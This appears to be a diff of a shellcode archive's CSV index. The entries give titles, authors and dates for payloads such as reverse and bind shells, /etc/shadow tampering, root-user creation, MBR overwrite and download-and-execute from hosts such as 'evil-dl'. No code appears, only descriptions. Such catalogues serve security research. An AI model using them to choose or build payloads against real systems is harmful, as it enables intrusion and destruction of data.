-13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
+13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
 13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0
 13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
 13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
-13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
+13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
-13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display [IP]:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
+13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
-13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - ipchains -F Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0
+13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0
 13442,platforms/lin_x86/shellcode/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13443,platforms/lin_x86/shellcode/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
 13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
@ -15981,9 +15983,9 @@ id,file,description,date,author,platform,type,port
 13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0
 13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
 13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
-13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
+13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0
-13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
+13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
 13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
@ -15993,8 +15995,8 @@ id,file,description,date,author,platform,type,port
 13467,platforms/multiple/shellcode/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0
 13468,platforms/multiple/shellcode/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0
 13469,platforms/multiple/shellcode/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0
-13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0
+13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0
-13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Callback 6666/TCP Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
+13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
 13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
 13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
 13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0
@ -16005,27 +16007,27 @@ id,file,description,date,author,platform,type,port
 13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
 13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
 13481,platforms/osx_ppc/shellcode/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
-13482,platforms/osx_ppc/shellcode/13482.c,"OSX/PPC - Add inetd backdoor Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
+13482,platforms/osx_ppc/shellcode/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
-13483,platforms/osx_ppc/shellcode/13483.c,"OSX/PPC - reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
+13483,platforms/osx_ppc/shellcode/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
 13484,platforms/osx_ppc/shellcode/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
-13485,platforms/osx_ppc/shellcode/13485.c,"OSX/PPC - create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
+13485,platforms/osx_ppc/shellcode/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
-13486,platforms/osx_ppc/shellcode/13486.c,"OSX/PPC - simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
+13486,platforms/osx_ppc/shellcode/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
 13487,platforms/osx_ppc/shellcode/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0
-13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File + Execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0
+13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0
 13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0
 13491,platforms/generator/shellcode/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,generator,shellcode,0
 13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
 13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
 13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
-13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
+13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
 13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
-13498,platforms/generator/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",generator,shellcode,0
+13498,platforms/generator/shellcode/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",generator,shellcode,0
 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
 13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
-13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
+13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
-13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
+13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0
 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
 13505,platforms/win_x86/shellcode/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0
@ -16055,14 +16057,14 @@ id,file,description,date,author,platform,type,port
 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
 13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0
-13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
+13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
-13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0
+13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0
 13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
 13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
 13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
 13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0
 13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0
-13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0
+13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0
 13565,platforms/win_x86/shellcode/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0
 13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0
 13569,platforms/win_x86/shellcode/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0
@ -16076,7 +16078,7 @@ id,file,description,date,author,platform,type,port
 13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0
 13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
 13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
-13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0
+13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0
 13595,platforms/win_x86/shellcode/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0
 13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
 13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
@ -16089,7 +16091,7 @@ id,file,description,date,author,platform,type,port
 13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0
 13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
 13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
-13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - Disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
+13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
 13635,platforms/win_x86/shellcode/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
 13636,platforms/win_x86/shellcode/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0
 13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
@ -16104,7 +16106,7 @@ id,file,description,date,author,platform,type,port
 13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
 13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
 13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0
-13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod  0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0
+13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0
 13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0
 13679,platforms/generator/shellcode/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,generator,shellcode,0
 13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0
@ -16121,14 +16123,14 @@ id,file,description,date,author,platform,type,port
 13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0
 13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0
 13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0
-13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Download File Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0
+13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0
-13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 -  Disable ASLR Security Shellcode Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0
+13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0
 13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0
 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0
 13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
 13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0
 13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
-13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
+13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
 13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
 13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0
@ -16136,7 +16138,7 @@ id,file,description,date,author,platform,type,port
 13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0
 13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
 13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
-13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
+13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
 14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
@ -16169,7 +16171,7 @@ id,file,description,date,author,platform,type,port
 14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0
 14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
-14873,platforms/win_x86/shellcode/14873.asm,"Windows x86 - Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
+14873,platforms/win_x86/shellcode/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
 15063,platforms/win_x86/shellcode/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
@ -16177,8 +16179,8 @@ id,file,description,date,author,platform,type,port
 15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
 15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
 15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15315,platforms/arm/shellcode/15315.asm,"ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15315,platforms/arm/shellcode/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15316,platforms/arm/shellcode/15316.asm,"ARM - Loader (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15316,platforms/arm/shellcode/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
@ -16188,8 +16190,8 @@ id,file,description,date,author,platform,type,port
 16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0
 16283,platforms/win_x86/shellcode/16283.txt,"Windows x86 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
-17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
+17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
-17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
+17224,platforms/osx/shellcode/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
